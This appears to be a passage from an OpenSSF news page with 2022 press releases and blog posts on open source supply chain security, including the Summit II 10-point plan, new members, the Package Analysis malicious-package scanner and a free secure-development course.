Skip to main content
All Posts By

OpenSSF

The Linux Foundation and Open Source Software Security Foundation (OpenSSF) Gather Industry and Government Leaders for Open Source Software Security Summit II

By Press Release

10-Point Open Source and Software Supply Chain Security Mobilization Plan Released with Initial Pledges Surpassing $30M 

WASHINGTON, DC – May 12, 2022 – The Linux Foundation and the Open Source Software Security Foundation (OpenSSF) brought together over 90 executives from 37 companies and government leaders from the NSC, ONCD, CISA, NIST, DOE, and OMB to reach a consensus on key actions to take to improve the resiliency and security of open source software. 

Open Source Software Security Summit II, is a follow-up to the first Summit held January 13, 2022 that was led by the White House’s National Security Council. Today’s meeting was convened by the Linux Foundation and OpenSSF on the one year after the anniversary of President Biden’s Executive Order on Improving the Nation’s Cybersecurity

The Linux Foundation and OpenSSF, with input provided from all sectors, delivered a first-of-its-kind plan to broadly address open source and software supply chain security. The Summit II plan outlines approximately $150M of funding over two years to rapidly advance well-vetted solutions to the ten major problems the plan identifies. The 10 streams of investment include concrete action steps for both more immediate improvements and building strong foundations for a more secure future. 

A subset of participating organizations have come together to collectively pledge an initial tranche of funding towards implementation of the plan. Those companies are Amazon, Ericsson, Google, Intel, Microsoft, and VMWare, pledging over $30M. As the plan evolves further more funding will be identified, and work will begin as individual streams are agreed upon.

This builds on the existing investments that the OpenSSF community members make into open source software. An informal poll of our stakeholders indicates they spend over $110M and employ nearly a hundred full-time equivalent employees focused on nothing but securing the open source software landscape. This plan adds to those investments.

KEY QUOTES

Jim Zemlin – Executive Director, Linux Foundation:  “On the one year anniversary of President Biden’s executive order, today we are here to respond with a plan that is actionable, because open source is a critical component of our national security and it is fundamental to billions of dollars being invested in software innovation today. We have a shared obligation to upgrade our collective cybersecurity resilience and improve trust in software itself.  This plan represents our unified voice and our common call to action. The most important task ahead of us is leadership.”

Brian Behlendorf – Executive Director, Open Source Security Foundation (OpenSSF):  “What we are doing here together is converging a set of ideas and principles of what is broken out there and what we can do to fix it.  The plan we have put together represents the 10 flags in the ground as the base for getting started.  We are eager to get further input and commitments that move us from plan to action.”

Anne Neurenberger, Deputy National Security Advisor, Cyber & Emerging Tech at National Security Council, The White House:

“President Biden signed the Executive Order on Cybersecurity last year to ensure the software our government relies on is secure and reliable, including software that runs our critical infrastructure.  Earlier this year, the White House convened a meeting between government and industry participants to improve the security of Open Source software.  The Open Source security foundation has followed up on the work at that meeting and convened participants from across industry to make substantial progress.  We are appreciative of all participants’ work on this important issue.”

Atlassian

Adrian Ludwig, Chief Trust Officer

“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be participating in OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. We’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.”

Cisco

Eric Wenger, Senior Director, Technology Policy, Cisco Systems

“Open source software (OSS) is a foundational part of our modern computing infrastructure. As one of the largest users of and contributors to OSS, Cisco makes significant investments in time and resources to improve the security of widely-used OSS projects. Today’s effort shows the stakeholder community’s shared commitment to making open-source development more secure in ways that are measurable and repeatable.”

Dell

Jim Medica, Technologist in Dell Technologies’ Office of the CTO:

“Never before has software security been a more critical part of the global supply chain. Today, in a meeting led by Anne Neuberger [linkedin.com], Deputy National Security Advisor for Cyber and Emerging Technology, Dell and my Open Source Security Foundation colleagues committed our software security expertise to execute the Open Source Software Security Mobilization Plan. Dell’s best and brightest engineers will engage with peers to develop risk-based metrics and scoring dashboards, digital signature methodologies for code signing, and Software Bill of Materials (SBoM) tools – all to address the grand challenge of open source software security. This is an excellent example of the leadership Dell provides to proactively impact software security and open-source security solutions, and reinforces our commitment to the open source software community, to our supply chain and to our national security.”

Ericsson

Per Beming, Head of Standard and Industry Initiatives

“Ericsson is one of the leading promoters and supporters of the open source ecosystem, accelerating the adoption and industry alignment in a number of key technology areas. The Open Source Security Foundation (OpenSSF) is an industry-wide initiative with the backing of the Linux Foundation with the objective of improving supply chain security in the open source ecosystem.

 “As a board member of OpenSSF, we are committed to open source security and we are fully supportive of the mobilization plan with the objective of improving supply chain security in the open source ecosystem. Being an advocate and adopter of global standards, the initiatives aim to strengthen open source security from a global perspective.”

GitHub

Mike Hanley, Chief Security Officer

“Securing the open source ecosystem starts with empowering developers and open source maintainers with tools and best practices that are instrumental to securing the software supply chain. As home to 83M developers around the world, GitHub is uniquely positioned and committed to advance these efforts, and we’ve continued our investments to help developers and maintainers realize improved security outcomes through initiatives including 2FA enforcement on GitHub.com and npm, open sourcing the GitHub Advisory Database, financial enablement for developers through GitHub Sponsors, and free security training through the GitHub Security Lab

“The security of open source is critical to the security of all software. Summit II has been an important next step in bringing the private and public sector together again and we look forward to continuing our partnerships to make a significant impact on the future of software security.”

Google

Eric Brewer, VP of Infrastructure at Google Cloud & Google Fellow

“We’re thankful to the Linux Foundation and OpenSSF for convening the community today to discuss the open source software security challenges we’re facing and how we can work together across the public and private sectors to address them. Google is committed to supporting many of the efforts we discussed today, including the creation of our new Open Source Maintenance Crew, a team of Google engineers who will work closely with upstream maintainers on improving the security of critical open source projects, and by providing support to the community through updates on key projects like SLSA, Scorecards; and Sigstore, which is now being used by the Kubernetes project. Security risks will continue to span all software companies and open source projects and only an industry-wide commitment involving a global community of developers, governments and businesses can make real progress. Google will continue to play our part to make an impact.”

IBM

Jamie Thomas, Enterprise Security Executive

“Today, we had the opportunity to share our IBM Policy Lab’s recommendations on how understanding the software supply chain is key to improving security. We believe that providing greater visibility in the software supply chain through SBoMs ( Software Bill of Materials) and using the Open Source Software  community as a valuable resource to encourage passionate developers to create, hone their skills, and contribute to the public good can help strengthen our resiliency. It’s great to see the strong commitment from the community to work together to secure open source software. Security can always be strengthened and I would like to thank Anne Neuberger today  for her deep commitment and open, constructive, technical dialogue that will help us pave the way to enhancing OSS security. ”

Intel

Greg Lavender, Chief Technology Officer and General Manager of the Software and Advanced Technology Group

“Intel has long played a key role in contributing to open source. I’m excited about our role in the future building towards Pat’s Open Ecosystem vision. As we endeavor to live into our core developer tenets of openness, choice and trust – software security is at the heart of creating the innovation platforms of tomorrow.”

Melissa Evers, Vice President, Software and Advanced Technology, General Manager of Strategy to Execution

“Intel commends the Linux Foundation in their work advancing open source security. Intel has a history of leadership and investment in open source software and secure computing: over the last five years, Intel has invested over $250M in advancing open-source software security. As we approach the next phase of Open Ecosystem initiatives, we intend to maintain and grow this commitment by double digit percentages continuing to invest in software security technologies, as well as advance improved security and remediation practices within the community and among those who consume software from the community.”

JFrog

Stephen Chin, Vice President of Developer Relations

“While open source has always been seen as a seed for modernization, the recent rise of software supply chain attacks has demonstrated we need a more hardened process for validating open-source repositories. As we say at JFrog, ‘with great software comes great responsibility’, and we take that job seriously. As a designated CNA, the JFrog Security Research team constantly monitors open-source software repositories for malicious packages that may lead to widespread software supply chain attacks and alerts the community accordingly. Building on that, JFrog is proud to collaborate with the Linux Foundation and other OpenSSF members on designing a set of technologies, processes, accreditations, and policies to help protect our nation’s critical infrastructure while nurturing one of the core principles of open source – innovation.” 

JPMorgan Chase

Pat Opet, Chief Information Security Officer

“We are proud to have worked with Open Source Security Foundation (OpenSSF) and its members to create the new Open Source Software Security Mobilization Plan, This plan will help to address security issues in the software supply chain which is critical to making the world’s software safer and more secure for everyone.”

Microsoft

Mark Russinovich, CTO, Microsoft Azure

“Open source software is core to nearly every company’s technology strategy. Collaboration and investment across the open source ecosystem will strengthen and sustain security for everyone. Microsoft’s commitment to $5M in funding for OpenSSF supports critical cross-industry collaboration. We’re encouraged by the community, industry, and public sector collaboration at today’s summit and the benefit this will have to strengthen supply chain security.”

OWASP Foundation

Andrew van der Stock, Executive Director

“OWASP’s mission is to improve the state of software security around the world. We are contributing to the Developer Education and Certification, as well addressing the Executive Order for improving the state and adoption of SBOMs. In particular, we would like to see a single, consumable standard across the board.” 

Mark Curphey (founder of OWASP) and John Viega (author of the first book on software security), Stream Coordinators

“We’re excited to see the industry’s willingness to come together on a single ‘bill of materials’ format. It has the potential to help the entire industry solve many important problems, including drastically improving response speed for when major new issues in open source software emerge.” 

SAP

Tim McKnight, SAP Executive Vice President & Chief Information Security Officer

“SAP is proud to be a part of the Open Source Software Security Summit II and contribute to the important dialogue on the topic of Open Source software security.

“SAP is firmly committed to supporting the execution of the Open Source Software Security Mobilization Plan and we look forward to continuing our collaboration with our government, industry, and academic partners.”

Sonatype

Brian Fox, CTO of Sonatype and stewards of Maven Central.

“It’s rare to see vendors, competitors, government, and diverse open source ecosystems all come together like they have today. It shows how massive a problem we have to solve in securing open source, and highlights that no one entity can solve it alone. The Open Source Software Security Mobilization Plan is a great step toward bringing our community together with a number of key tactics, starting with securing OSS production, which will make the entire open source ecosystem stronger and safer.” 

Wipro

Andrew Aitken, Global Head of Open Source

“Wipro is committed to helping ensure the safety of the software supply chain through its engagement with OpenSSF and other industry initiatives and is ideally suited to enhance efforts to provide innovative tooling, secure coding best practices and industry and government advocacy to improve vulnerability remediation.

“As the only global systems integrator in the OpenSSF ecosystem and in line with its support of OpenSSF objectives, Wipro will commit to training 100 of its cybersecurity experts to the level of trainer status in LF and OpenSSF secure coding best practices and to host training workshops with its premier global clients and their developer and cybersecurity teams.

“Further, Wipro will increase its public contributions to Sigstore and the SLSA framework by integrating them into its own solutions and building a community of 50+ contributors to these critical projects.”

KEY BACKGROUND

Three Goals of the 10-Point Plan

  1. Securing Open Source Security Production
    1. Make baseline secure software development education and certification the new normal for pro OSS developers
    2. Establish a public, vendor-neutral, objective-metrics based risk assessment dashboard for the top 10,000 open source components.
    3. Accelerate the adoption of digital signatures on software releases
    4. Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
  2. Improving Vulnerability Discovery and Remediation
    1. Accelerate discovery of new vulnerabilities by maintainers and experts.
    2. Establish the corps of “volunteer firefighter” security experts to assist open source projects during critical times.
    3. Conduct third-party code reviews (and any necessary remediation work) of 200 of the most-critical open source software components yearly
    4. Coordinate industry-wide data sharing to improve the research that helps determine the most critical open source software.
  3. Shorten ecosystem Patching Response Time
    1. Software Bill of Materials (SBOM) Everywhere – improve SBOM tooling and training to drive adoption
    2. Enhance the 10 most critical open source security build systems, package managers, and distribute systems with better supply chain security tools and best practices.

The 10-Point Plan Summarized (available in full here)

  1. Security Education Deliver baseline secure software development education and certification to all. 
  2. Risk Assessment Establish a public, vendor-neutral, objective-metrics-based risk assessment dashboard for the top 10,000 (or more) OSS components.
  3. Digital Signatures Accelerate the adoption of digital signatures on software releases.
  4. Memory Safety Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
  5. Incident Response Establish the OpenSSF Open Source Security Incident Response Team, security experts who can step in to assist open source projects during critical times when responding to a vulnerability.
  6. Better Scanning Accelerate discovery of new vulnerabilities by maintainers and experts through advanced security tools and expert guidance.
  7. Code Audits Conduct third-party code reviews (and any necessary remediation work) of up to 200 of the most-critical OSS components once per year. 
  8. Data Sharing Coordinate industry-wide data sharing to improve the research that helps determine the most critical OSS components.
  9. SBOMs Everywhere Improve SBOM tooling and training to drive adoption. 
  10. Improved Supply Chains Enhance the 10 most critical OSS build systems, package managers, and distribution systems with better supply chain security tools and best practices.

Media Contact
Edward Cooper
openssf@babelpr.com

Testimony to the US House Committee on Science and Technology

By Blog

We’re pleased to share that Brian Behlendorf, OpenSSF General Manager, testified to the United States House of Representatives Committee on Science, Space, and Technology today. Brian’s testimony shares the work being done within the Open Source Security Foundation and broader open source software community to improve security and trustworthiness of open source software.

A copy of Brian’s written remarks are linked here.

OpenSSF Announces 15 New Members To Further Strengthen Open Source Software Supply Chain Security

By Press Release

Expands core working groups ahead of OpenSSF Day

SAN FRANCISCO, May 9, 2022 – The Open Source Security Foundation (OpenSSF) a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important software supply chain security initiatives, today announced 15 new members from leading software development, cybersecurity, financial services, communications, and academic sectors.

This round of commitments is led by two new premier members, Atlassian and Sonatype, who will join the OpenSSF governing board. New general member commitments come from Arnica, Bloomberg, Comcast, Cycode, F5, Futurewei Technologies, Legit Security, Sectrend, SUSE, and Tenable.

“We are thrilled to welcome Atlassian and Sonatype, two companies who play critical roles in modern software development and security, to the OpenSSF governing board”, Brian Behlendorf, General Manager at OpenSSF. “Open source software supply chain attacks threaten the very foundations of innovation that billions of people rely upon. Our 15 new members join a growing community of organizations, developers, researchers, and security professionals that are investing time and resources required to respond in this constantly evolving threat landscape.”

Open source software has become the foundation on which our digital economy is built. As noted in the Linux Foundation’s 2022 Software Bill of Materials (SBOM) and Cybersecurity Readiness report, 98% of organizations use open source regularly. The same study revealed that 72% of organizations are very or extremely concerned about software security. Recent vulnerabilities, such as the one impacting Log4j, have caused many organizations to prioritize software supply chain security and realize the need to be fully abreast of the open source ecosystem, as well as contributing to it. From governments to businesses, open source security has been brought to the top of the agenda as a priority issue to address and as a result, OpenSSF is seeing membership rise at a rapid pace.

The latest commitments follow a productive period for OpenSSF in which the foundation expanded its core working groups to include Securing Software Repositories. This group aims to improve cybersecurity practices where developers download open source packages most often. 

Furthermore, on June 20th, the foundation will host a full day of sessions at OpenSSF Day. Presentations, delivered by working group leaders, will include subjects such as Best Practice Badges and Other Good Practices, Three Things Your Open Source Project Must Consider, and Securing Critical Projects. The day will conclude with a panel discussion on the Future of Securing Open Source Software. Registration and attendance are free for all those attending the Open Source Summit conference.

Premier Member Quotes

Atlassian

“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be joining OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. As a premier member, we’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.” – Adrian Ludwig, Chief Trust Officer, Atlassian

Sonatype

“As the maintainers of the largest repository of open source components in Maven Central, we have a unique view into how great the demand for open source has become in recent years. However, as that demand has grown, bad actors have recognized the power of open source and are seeking to use that against the industry. As these software supply chain attacks become more commonplace, open source developers have become the frontline of this battle. Our key mission at Sonatype is to help people understand their software supply chain, and harness all of the good that open source has to offer, without any of the risk. OpenSSF and its members share a similar vision. I’m excited to play a bigger role in OpenSSF as a board member and collectively work with other members to keep open source ecosystems safe and secure, as we all figure out how to battle both new and old attacks on the community.” – Brian Fox, CTO and Co-founder, Sonatype

General Member Quotes

Arnica

“Software supply chain attack vectors have consistently caught the security community off-guard. Based on Arnica’s research across all attacks since 2018, we found two consistent root causes. One, improper access management to source code and two, inability to detect abnormal behavior in the developer toolset. The journey to solve these gaps is long and we are working on perfecting each risk mitigation strategy one-by-one, starting with introducing the first-ever self-service access management for GitHub.” – Nir Valtman, Co-Founder and CEO, Arnica

Bloomberg

“We are incredibly excited to join the Open Source Security Foundation (OpenSSF), whose values of public good, openness and transparency, and diversity, inclusion, and representation, align with those of Bloomberg. As an ‘Open Source First’ organization, we greatly value open source and its use within the finance sector, and we are fully committed to helping secure the open source software supply chain, something we have invested in via an ongoing collaboration between our CTO Office and Engineering organization.” – Gavin McNay, Security Architect in Bloomberg’s CTO Office

Comcast

“Comcast is committed to open source software. We use it to build products, attract talent, and develop our technology to improve the customer experience. When it comes to open source security, everyone plays a role. We are thrilled to join OpenSSF with the global open-source community to see how we can continue to evolve to make open-source development even more secure.” – Shilla Saebi, Open Source Program Office Lead, Comcast Cable

F5

“The growth of open source usage has magnified the importance of advancing OSS supply chain security for all, which can only be achieved as a shared priority among the industry. At F5, we are committed to ensuring our customers’ apps are fast, available and secure in any environment. That is why we value the work of the Open Source Security Foundation and its participating members, and look forward to sharing our domain expertise to help advance this important work.” – Geng Lin, EVP and Chief Technology Officer, F5

Futurewei Technologies

“OpenSSF is a premier and leading organization on open source security. Futurewei is very excited to join OpenSSF, and to engage in the conversations on the important topics of open source security and sustainability. We look forward to exciting discussions and collaborations with OpenSSF.” – Chris Xie, Head of Open Source Strategy and Business Development 

Legit Security

“Legit Security is pleased to join OpenSSF to advance the security of software supply chains within the open-source ecosystem as well as giving organizations tools to secure the infrastructure that makes up the SDLC – such as pipelines and systems. Attacks on software supply chains are estimated to increase between three to six times per year and are a global threat. We look forward to working with OpenSSF to publish security research and contribute tools and code for more secure software delivery and consumption across the entire community.” – Liav Caspi, CTO of Legit Security

Sectrend

“We feel very excited to be a part of this industry-leading Open Source Security foundation (OpenSSF). Together with other top-notch peers around the globe in various sectors under this initiative, we, Sectrend, are aiming to assist organizations of any size address the security and license compliance risks from open-source software. Securing the software supply chain is very critical for every company. Within the framework of OpenSSF or the Linux Foundation, Sectrend will make a tremendous contribution to this community-driven process in tooling, training, research, best practices, and consulting. Beyond Security, More than Open Source.” – Alex Xue, CEO, Sectrend

SUSE

“According to recent research in an Economist Impact survey, 95% of organizations are practicing open innovation, demonstrating how open source software is critical to business’s infrastructure and applications. With this comes the need for software to be secure and is why SUSE takes a proactive stance against security and compliance risks, leveraging tools for full lifecycle security including vulnerability management, CI/CD pipeline security, run-time security and government security certifications. SUSE is joining OpenSSF to further collaborate with the efforts to ensure the security of the open source software supply chain.” – Brent Schroeder, Head of SUSE’s Office of the CTO

Tenable

“We’re proud to be part of OpenSSF and join so many industry peers who understand the critical importance of securing open-source software and its associated supply chain. Log4j showed the world how pervasive OSS use is and how vulnerable it can be if the proper development and controls are not put in place to protect it. Tenable’s commitment to increasing visibility in attack surfaces includes shifting left to secure software development and helping organizations understand where the risks are throughout their systems.” Glen Pendley, CTO, Tenable

The foundation also announced new Associate Members, including the Eclipse Foundation, China Academy of Information and Communications Technology (CAICT) and Chinese Academy of Sciences (ISCAS). 

Additional Resources

  • View the complete list of the OpenSSF members
  • Attend OpenSSF Day at the Linux Foundation’s Open Source Summit on June 20 
  • Contribute efforts to one or more of the active OpenSSF working groups
  • Read the OpenSSF and Harvard’s Census II Report, shedding light on the most commonly used FOSS packages at the application library level

About OpenSSF

Hosted by the Linux Foundation, the OpenSSF (launched in August 2020) is a cross-industry organization that brings together the industry’s most important open source security initiatives and the individuals and companies that support them. It combines the Linux Foundation’s Core Infrastructure Initiative (CII), founded in response to the 2014 Heartbleed bug, and the Open Source Security Coalition, founded by the GitHub Security Lab to build a community to support open source security for decades to come. The OpenSSF is committed to collaboration and working both upstream and with existing communities to advance open source security for all. For more information, please visit: https://openssf.org/

About the Linux Foundation

Founded in 2000, the Linux Foundation and its projects are supported by more than 1,800 members and is the world’s leading home for collaboration on open source software, open standards, open data, and open hardware. Linux Foundation’s projects are critical to the world’s infrastructure, including Linux, Kubernetes, ONAP, Node.js, Hyperledger, RISC-V, and more.  The Linux Foundation’s methodology focuses on leveraging best practices and addressing the needs of contributors, users, and solution providers to create sustainable models for open collaboration. For more information, please visit us at: linuxfoundation.org

Media Contacts

Babel for OpenSSF

openssf@babelpr.com

Introducing Package Analysis: Scanning open source packages for malicious behavior

By Blog

By Caleb Brown and David A. Wheeler, on behalf of Securing Critical Projects Working Group

Today we’re pleased to announce the initial prototype version of the Package Analysis project, an OpenSSF project addressing the challenge of identifying malicious packages in popular open source repositories. In just one month of analysis, the project identified more than 200 malicious packages uploaded to PyPI and npm. 

The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run? The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously. This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem. Though the project has been in development for a while, it has only recently become useful following extensive modifications based on initial experiences.

The vast majority of the malicious packages we detected are dependency confusion and typosquatting attacks. The packages we found usually contain a simple script that runs during an install and calls home with a few details about the host. These packages are most likely the work of security researchers looking for bug bounties, since most are not exfiltrating meaningful data except the name of the machine or a username, and they make no attempt to disguise their behavior. Still, any one of these packages could have done far more to hurt the unfortunate victims who installed them, so Package Analysis provides a countermeasure to these kinds of attacks.

There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of:

  • detecting differences in package behavior over time;
  • automating the processing of the Package Analysis results;
  • storing the packages themselves as they are processed for long-term analysis; 
  • and improving the reliability of the pipeline.

Check out our GitHub Project and Milestones for more opportunities, and feel free to get involved on the OpenSSF Slack. This project is one of the efforts of the OpenSSF Securing Critical Projects Working Group. You can also explore other OpenSSF projects like SLSA and Sigstore, which expand beyond the security of packages themselves to address package integrity across the supply chain.

Your Favorite Software Repositories, Now Working Together

By Blog

Authors: Dustin Ingram (Google), Jacques Chester (Shopify)

A software repository is a critical component of any open source ecosystem: it provides a trusted central channel to publish, store and distribute open-source third-party software to all consumers. Package indexes and package managers exist for almost every software ecosystem, and share many of the same goals, features and threats.

But these repositories and related tooling have been developed independently, with little knowledge sharing between them over the years. This means the same problems get solved repeatedly, mostly in isolation. As it becomes more important to increase the overall security of these critical repositories, it has also become important for these repositories to collaborate and share knowledge.

Today, we’re announcing the creation of the Securing Software Repositories Working Group, a community collaboration with a focus on the maintainers of software repositories, software registries, and tools (like package managers) that rely on them, at various levels including system, language, plugin, extensions and container systems.

We’ve brought together many of the key maintainers, contributors and stakeholders of software repositories that are critical to many open source ecosystems, including Java, Node.js, Ruby, Rust, PHP, and Python, to participate in the group.

This working group provides a forum to share experiences and to discuss shared problems, risks and threats. It also provides a collaborative environment for aligning on the introduction of new tools and technologies to strengthen and secure our respective software repositories, such as Sigstore.

You can learn more about the working group’s objectives in our repository and charter, join our meetings via the public OSSF calendar, or find us on the OpenSSF Slack in the #securing_software_repos channel. If you maintain or operate a software repository system of any kind, please join in!

Free Developing Secure Software Training Course From OpenSSF Now Available

By Blog

Log4Shell, SolarWinds Compromise, Heartbleed – cybersecurity breaches have become household names in recent years. These issues are costing organizations billions of dollars in prevention and remediation costs, yet at the same time they are becoming ever more common. Reacting to breaches after the fact is useful, but not enough; such reactions fail to protect users in the first place. Security needs to instead be baked into software before it’s released. Unfortunately, most software developers don’t know how to do this.

To alleviate this issue and improve access to cybersecurity training for everyone from developers to operations teams to end users, the Open Source Security Foundation (OpenSSF) has partnered with Linux Foundation Training & Certification to release a new, free, online training course, Developing Secure Software. Those who complete the course and pass the final exam will earn a certificate of completion valid for two years.

Geared towards software developers, DevOps professionals, software engineers, web application developers, and others interested in learning how to develop secure software, this course focuses on practical steps that can be taken, even with limited resources, to improve information security. The goal is to make it easier to create and maintain systems that are much harder to successfully attack, reduce the damage when attacks are successful, and speed the response so that any latent vulnerabilities can be rapidly repaired.

This course starts by discussing the basics of cybersecurity, such as what risk management really means. It discusses how to consider security as part of the requirements of a system, and what potential security requirements you might consider. It then focuses on how to design software to be secure, including various secure design principles that will help you avoid bad designs and embrace good ones. It also considers how to secure your software supply chain, that is, how to more securely select and acquire reused software (including open source software) to enhance security. 

The course also focuses on key implementation issues and practical steps that you can take to counter the most common kinds of attacks. Discussion follows on how to verify software for security, including various static and dynamic analysis approaches, as well as how to apply them (e.g., in a continuous integration pipeline). It also discusses more specialized topics, such as the basics of how to develop a threat model and how to apply various cryptographic capabilities. The course content mirrors that in the Secure Software Development program we offer with edX, but in a single course instead of three.

The self-paced course can be completed in about 14-18 hours and includes quizzes to test the knowledge gained. Upon completion, participants will receive a digital badge verifying that they have been successful in all required coursework and have learned the material. This digital badge can be added to resumes and social media profiles. 

Enroll today to start improving your cybersecurity skills and practices!

Open Source Security Foundation Attracts New Commitments, Advances Key Initiatives in Weeks Since White House Security Summit

By Press Release

SAN FRANCISCO, March 1, 2022, The Open Source Security Foundation (OpenSSF) a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important open source security initiatives, today announced 20 new organizations have joined OpenSSF to help identify and fix security vulnerabilities in open source software and develop improved tooling, training, research, best practices, and vulnerability disclosure practices. It is also announcing the latest milestones achieved across a variety of its technical initiatives, all of which underscore the cross-industry momentum that is taking place as a result of increasing awareness in the wake of recent security incidents and since the recent White House Open Source Security Summit and recent Congressional hearings. 

“The time is now for this community to make real progress on software security. Since open source is the foundation on which all software is built, the work we do at OpenSSF with contributions from companies and individuals from around the world is fundamental to that progress,” said Brian Behlendorf, executive director at OpenSSF. “We’ve never had more support or focus on building, sustaining, and securing the software that underpins all of our lives, and we’re happy to be the neutral forum where this can happen.” 

New Premier Member commitments come from 1Password, Citi, Coinbase, Huawei Technologies, JFrog, and Wipro. New General Member commitments come from Accuknox, Alibaba Cloud, Block, Inc, Blockchain Technology Partners, Catena Cyber, Chainguard, Cloudsmith, DeployHub, MongoDB, NCC Group, ReversingLabs, Spotify, Teleport, and Wingtecher Technology. New Associate Members include MITRE and OpenUK. For a complete review of the OpenSSF member roster, please visit: https://openssf.org/about/members/

These commitments come on the heels of the recent White House Open Source Security Summit, where the Linux Foundation and OpenSSF represented hundreds of its project communities and discussed how best to support software security and open source security posture going forward. This summit was a major milestone in the Linux Foundation’s engagement with the public sector and underscored its position supporting not only the projects it hosts but all of the world’s most critical open source infrastructure. 

Since the OpenSSF announced initial commitments in October, the community has continued to advance the OpenSSF mission. Some selected highlights include:

New Alpha-Omega Project Launches with $5m Investment to Improve OSS Security Posture

OpenSSF also recently announced the Alpha-Omega Project to improve the security posture of open source software (OSS) through direct engagement of software security experts and automated security testing. It is initially supported by Microsoft and Google with a combined investment of $5 million. The Project improves global OSS supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open source code and get them fixed. “Alpha” will work with the maintainers of the most critical open source projects to help them identify and fix security vulnerabilities and improve their security posture. “Omega” will identify at least 10,000 widely deployed OSS projects where it can apply automated security analysis, scoring, and remediation guidance to their open source maintainer communities.

Automated Security Tool, Scorecards, Increases Scans from 50,000 to 1 Million Projects

Scorecards is an OpenSSF project that helps open source users understand the risks of the dependencies they consume. OpenSSF members GitHub and Google recently announced Scorecards v4, which includes Scorecards GitHub Workflow Action to automate the identification of how changes to a project affected its security. It also includes License Check to detect the presence of a project license and Dangerous-Workflow check to detect dangerous usage of the pull_request_target trigger and risks of script injections in GitHub workflows. The Scorecards project has also increased the scale of scans from 50,000 projects to one million projects. These software projects are identified as most critical based on their number of direct dependencies, giving a more detailed view of the ecosystem and strengthening supply chain security as users see improved coverage of their dependencies. 

Project Sigstore Sees Massive Contribution, Adoption to Sign, Verify and Protect OSS 

Sigstore recently released a project update that reported nearly 500 contributors, 3,000 commits, and over one million entries in Rekor. For more information on what is driving this adoption, please visit the Sigstore blog.

The “Great MFA Distribution” Distributes Codes to Claim Free Hardware Security Tokens to Almost 1000 Top OSS Developers

In the pursuit of encouraging wider adoption of multi-factor authentication (MFA) by developers of critical open source projects, The Securing Critical Projects Working Group coordinated the distribution of nearly 1000 codes for free MFA tokens (graciously donated by Google and Github) to developers of the 100 most critical open source projects. This dsiribution is a small but critical step in avoiding supply chain attacks based on stolen credentials of key developers.

To join OpenSSF and/or contribute to these important initiatives, please visit: https://openssf.org/

Premier Member Quotes

1Password

“We’re proud to be among like-minded organizations and individuals that share a collective commitment to improving the security posture of open source software,” said Pedro Canahuati, Chief Technology Officer at 1Password. “Much of the technology we use today is built on open source software. Given 1Password’s human-centric approach to building user-friendly applications, it’s important to us that its integrity and security is protected.”

Citi

“The security of open source software and its supply chain is an essential aspect to Citi. We have worked with the open source community on bolstering security in these areas, and we look forward to strengthening this mission by joining the Open Source Security Foundation,” said Jonathan Meadows, Head of Cloud & Application Security Engineering, Citibank.

Coinbase

“Coinbase is the world’s most trusted cryptocurrency exchange, and the security of our open source dependencies — as well as the broader crypto ecosystem — is paramount. The OpenSSF’s goals align with our own, and Coinbase is proud to be contributing to increasing the security of open source software for the benefit of all,” said Jordan Harband, Staff Developer Relations Engineer, Coinbase.

Huawei Technologies

“The importance of open source software security is well recognized by the customer, industry, and government. It is time for the community to take strategic, continuous, effective, and efficient actions to advance the open source software security posture.  We are very glad to see OpenSSF launching initiatives (Scorecard, Alpha-Omega, SigStore, etc.) to improve the open source software security directly,” said Dr. Kai Chen, Chief Security Strategist, Huawei. “Huawei commits to strengthen investment on cybersecurity and to maintain a global, secure and resilient  open source software supply chain.”

JFrog

“Open source software is the foundation of today’s modern systems that run enterprises and government organizations alike – making software part of a nation’s critical infrastructure,” said Stephen Chin, VP of Developer Relations, JFrog. “JFrog is honored to be part of OpenSSF to accelerate innovation and advancement in supply chain security. Projects coming out of OpenSFF help make JFrog’s liquid software vision a secure reality.”

Wipro

“With the increasing adoption of open source software and its growing importance in enabling innovation and transformation comes commensurate cybersecurity risks. The community needs a concerted effort to address them. We are excited to join the governing board of OpenSSF to collaborate with other members on defining and building set of solutions and frameworks and best practices to help ensure the integrity of the open source software supply chain and contribute our domain expertise, breadth of resources and global reach to this important effort,”  said Subha Tatavarti, CTO, Wipro Limited.

General Member Quotes

Accuknox

“In the Shift Left, DevSecOps Developer-led adoption of Security Tools and platforms an OpenSource led approach is imperative. We are thrilled to see OpenSSF launching path-breaking initiatives to help end-users and technology providers harness the power of open source and contribute to the collective knowledge capital,” said Nat Natraj, co-founder, CEO, AccuKnox.

Alibaba Cloud

